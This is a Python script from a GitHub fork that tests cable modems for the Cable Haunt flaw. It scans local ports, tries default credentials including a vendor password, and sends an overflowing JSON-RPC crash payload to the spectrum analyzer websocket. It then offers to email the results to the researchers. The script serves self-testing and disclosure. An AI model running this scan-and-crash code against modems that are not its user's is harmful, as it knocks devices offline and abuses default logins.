forked from Lyrebirds/cable-haunt-vulnerability-test
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtest.py
235 lines (204 loc) · 9.7 KB
/
test.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
import websockets
import webbrowser
import threading
import time
import socket
import concurrent.futures
import asyncio
import urllib.parse
import os
from websockets.exceptions import WebSocketException
from queue import Queue
from typing import Tuple, List
from html import unescape
from base64 import b64encode
from operator import itemgetter
# ================ Scan parameters ================
# The default IPs tested for the Spectrum Analyzer
# are a reflection of what we see in the wild.
# It is rarely hosted on the default gateway, so
# please add IPs of changeing one, i.e.
# ['192.168.100.1', '192.168.0.1', '192.168.1.1']
targets = ['192.168.100.1', '192.168.0.1']
portRange = range(23, 65535)
credentials = [None, 'spectrum:spectrum', 'admin:password', 'askey:askey', "user:Broadcom", 'Broadcom:Broadcom', 'broadcom:broadcom', 'admin:bEn2o#US9s', 'admin:admin']
# =================================================
debuging = True
validPayload = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":0,"fStopHz":1218000000,"fftSize":1024,"gain":1,"numOfSamples":1},"id":"0"}'
crashPayload = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + 'A'*200 + ',"fftSize":1024,"gain":1,"numOfSamples":1},"id":"0"}'
checkString = 'RPCResultObject'
timeout = 20
tcpTimeOut = 0.3
print_lock = threading.Lock()
possibleTargets = []
pongResponseString = ""
stopPingEvent = threading.Event()
def portscan(port, ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(tcpTimeOut)
try:
s.connect((ip, port))
with print_lock:
print("Found: ", ip, ":", port)
possibleTargets.append((ip, port))
s.close()
except:
pass
def threader():
while True:
port, ip = q.get()
portscan(port, ip)
q.task_done()
q = Queue()
for x in range(30):
t = threading.Thread(target=threader)
t.daemon = True
t.start()
print("Scanning ports between", portRange.start, "and",
portRange.stop, "for adresses:", targets)
for ip in targets:
for port in portRange:
q.put((port, ip))
q.join()
async def testEndpointWithCredentials(ipPort: Tuple[str, int], data: str, inputCredentials: List[str], extraHeaders = None):
try:
resp = await sendSpectrumDataTimeout(ipPort, data, inputCredentials[0], extraHeaders)
return resp, inputCredentials[0]
except (WebSocketException, asyncio.TimeoutError) as e:
if len(inputCredentials) > 1:
return await testEndpointWithCredentials(ipPort, data, inputCredentials[1:], extraHeaders)
else:
raise
async def sendSpectrumDataTimeout(ipPort: Tuple[str, int], data: str, credsString: str, additionalHeaders = None, inputTimeout=timeout):
return await asyncio.wait_for(sendSpectrumData(ipPort, data, credsString, additionalHeaders), inputTimeout)
async def sendSpectrumData(ipPort: Tuple[str, int], data: str, credsString: str, additionalHeaders = None):
headers = {}
if credsString is not None:
authString=b64encode(credsString.encode())
headers = {'Authorization': 'Basic ' + (authString).decode("utf-8")}
if additionalHeaders:
headers.update(additionalHeaders)
uri = 'ws://' + ipPort[0] + ':' + str(ipPort[1]) + '/Frontend'
async with websockets.connect(uri, extra_headers=headers, subprotocols=['rpc-frontend']) as websocket:
print("Trying with credentials:", credsString)
await websocket.send(data)
resp = await websocket.recv()
return resp
def identifySpectrumAnalyzer(target, headers=None):
resp, retCredentials = asyncio.get_event_loop().run_until_complete(testEndpointWithCredentials(target, validPayload, credentials, headers))
resultString = ""
resultTarget = None
if checkString in resp:
resultString = str(target) + " is a Spectrum Analyzer"
resultTarget = {"target": target, "credentials": retCredentials}
else:
resultString = str(target) + " is a websocket endpoint but not the Spectrum Analyzer"
return resultString,resultTarget
async def pingModem(inputTarget):
pongs = []
lostPongs = 0
for i in range(0, 60):
if stopPingEvent.isSet():
break
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(tcpTimeOut)
s.connect(inputTarget)
s.close()
pongs.append(f"{i} R")
lostPongs = 0
except:
pongs.append(f"{i} L")
lostPongs += 1
if all('L' in pong for pong in pongs[-5:]):
break
await asyncio.sleep(1)
return pongs, lostPongs
async def attemptSpectrumAnalyzerCrash(target):
tmpStr = str(target) + " | "
pingTask = asyncio.create_task(pingModem(target['target']))
crashTask = asyncio.create_task(sendSpectrumDataTimeout(target['target'], crashPayload, target['credentials']))
done, pending = await asyncio.wait([pingTask, crashTask], return_when=asyncio.FIRST_COMPLETED)
stopPingEvent.set()
pongs, lostPongs = await pingTask
if crashTask is done and not crashTask.exception():
response = crashTask.result()
if checkString in response:
tmpStr += 'Spectrum Analyzer responding correctly to crash payload: Modem is not vulnerable'
else:
tmpStr += 'Spectrum Analyzer responding with odd response "' + resp + '": Modem is probably not vulnerable'
else:
crashTask.cancel()
totalPings = len(pongs) + lostPongs
if totalPings > 1 and lostPongs > 1:
tmpStr += 'Spectrum Analyzer did not answer ' + str(lostPongs) + ' pings in a row after sending crash payload: Modem is vulnerable'
else:
tmpStr += 'Spectrum Analyzer stayed up after crash payload: Modem likely not vulnerable'
print(tmpStr)
print("Collecting results...")
return tmpStr, str(pongs)
victim = None
crashResultStrings= ""
endpointTestStr = ""
possibleTargets.sort(key=itemgetter(1), reverse=True)
print("\r\nFinished scanning ports - Starting Endpoint Testing\r\n")
for target in possibleTargets:
try:
print("Testing ", target[0]+':'+str(target[1]))
tmpStr,victim = identifySpectrumAnalyzer(target, {'Origin': 'http://example.com', 'Host': 'example.com'})
tmpStr += " - foreign origin/host headers accepted"
except:
try:
print("\r\nRetrying with different headers")
tmpStr,victim = identifySpectrumAnalyzer(target, {'Origin': 'http://'+target[0]+ ':'+str(target[1]),'Host':target[0]+':'+str(target[1])})
tmpStr += " - only local headers accepted"
except (WebSocketException, asyncio.TimeoutError, UnicodeDecodeError, TimeoutError, ConnectionRefusedError) as e:
tmpStr = str(target) + " is not a websocket endpoint (" + str(type(e).__name__) + ": " + str(e) + ")"
print(tmpStr, "\r\n")
endpointTestStr += "\r\n" + tmpStr
if(victim):
print('Found the spectrum analyzer on this endpoint: ', victim)
print("If we continue your modem might reboot, do you want to continue? (Y/n)")
ans=input()
if ans != "n" or ans != "N":
print('Sending crash payload')
print('If modem crashes you are vulnerable to Cable Haunt.')
result, pongResponseString = asyncio.run(attemptSpectrumAnalyzerCrash(victim))
crashResultStrings = '\r\n' + result
break
if not victim:
print('We could not find ip and port for spectrum analyzer. This could mean you are not vulnerable or that we did not test for the correct IP, port or credentials. Please refer to the repo if you want to expand the list of IPs, ports and credentials you are scanning.')
emailString="Hello Cable Haunt, I have tested my modem for the vulnerability.\r\n"
print("Thank you for testing your modem, do you want to send your results to Cable Haunt? (Y/n)")
ans=input()
if ans != "n" and ans != "N":
print("Who produced your modem? (Leave blank if unknown):")
emailString += "\r\nManufacturer: " + input()
print("What is the model? (Leave blank if unknown):")
emailString += "\r\nModel: " + input()
print("What is the firmware version? (Leave blank if unknown):")
emailString += "\r\nFW: " + input()
print("Who is your ISP? (Leave blank if unknown):")
emailString += "\r\nISP: " + input()
print("Can you confirm the modem did reboot/crash?")
emailString += "\r\nReboot confirmed: " + input()
print("Additional comments (Enter ends comment):")
emailString += "\r\nAdditional comments: " + input()
emailString += "\r\n====================================\r\n"
emailString += "\r\nVictim: " + str(victim)
emailString += "\r\nPongs: " + str(pongResponseString)
emailString += "\r\nTested IPs: " + str(targets)
emailString += "\r\nPort range: " + str(portRange)
emailString += "\r\nResp check string: " + str(checkString)
emailString += "\r\nTested creds: " + str(credentials)
emailString += "\r\nValid payload: " + str(validPayload)
emailString += "\r\nCrash payload: " + str(crashPayload)
emailString += "\r\n"+str(endpointTestStr)
emailString += "\r\n"+str(crashResultStrings)
mailUrl = "mailto:[email protected]?subject=Cable%20Haunt%20modem%20test&body=" + urllib.parse.quote(emailString)
if os.environ.get('NO_BROWSER', False):
print("Can't open link directly. Please copy and paste link to send us your results. \r\nPress any key to get link.")
input()
print(mailUrl)
else:
webbrowser.open("mailto:[email protected]?subject=Cable Haunt modem test&body=" + urllib.parse.quote(emailString))